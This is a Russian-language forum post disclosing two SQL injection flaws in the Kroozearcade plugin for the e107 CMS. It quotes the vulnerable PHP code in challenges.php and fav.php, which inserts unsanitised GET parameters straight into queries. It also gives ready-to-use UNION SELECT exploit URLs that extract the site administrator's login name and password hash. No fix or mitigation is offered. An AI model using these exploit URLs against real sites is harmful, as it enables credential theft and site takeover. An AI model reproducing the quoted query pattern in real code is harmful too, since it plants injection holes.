Показать сообщение отдельно
Старый 05.07.2010, 12:31   #6
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию e107 Plugin [Kroozearcade] SQL injection Vulnerability

Plugin name: Kroozearcade (download)
Version: 8.0

SQL injection

#1
Vuln file: /e107_plugins/kroozearcade_menu/challenges.php
PHP код:
/*...*/
if (isset($_GET['details'])) {
$sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_challenges WHERE id=".$_GET['details']."");
$row $sql->db_Fetch();
/*...*/ 
Need: user account
Exploit:
Код:
http://[host]/[path]/e107_plugins/kroozearcade_menu/challenges.php?details=0+union+select+null,null,null,null,null,null,concat_ws(0x3a,user_loginname,user_password),null,null,null,null,null,null+from+e107_user+where+user_id=1
#2
Vuln file: /e107_plugins/kroozearcade_menu/fav.php
PHP код:
/*...*/
if(isset($_GET['confirm'])) {
    
$sql->mySQLresult = @mysql_query("SELECT game_title FROM ".MPREFIX."arcade_games WHERE game_id=".$_GET['gameid']."");
    
$conf $sql->db_Rows();
/*...*/ 
Need: user account
Exploit:
Код:
http://[host]/[path]/e107_plugins/kroozearcade_menu/fav.php?confirm=xek&gameid=0+union+select+concat_ws(0x3a,user_loginname,user_password)+from+e107_user+where+user_id=1
RulleR вне форума   Ответить с цитированием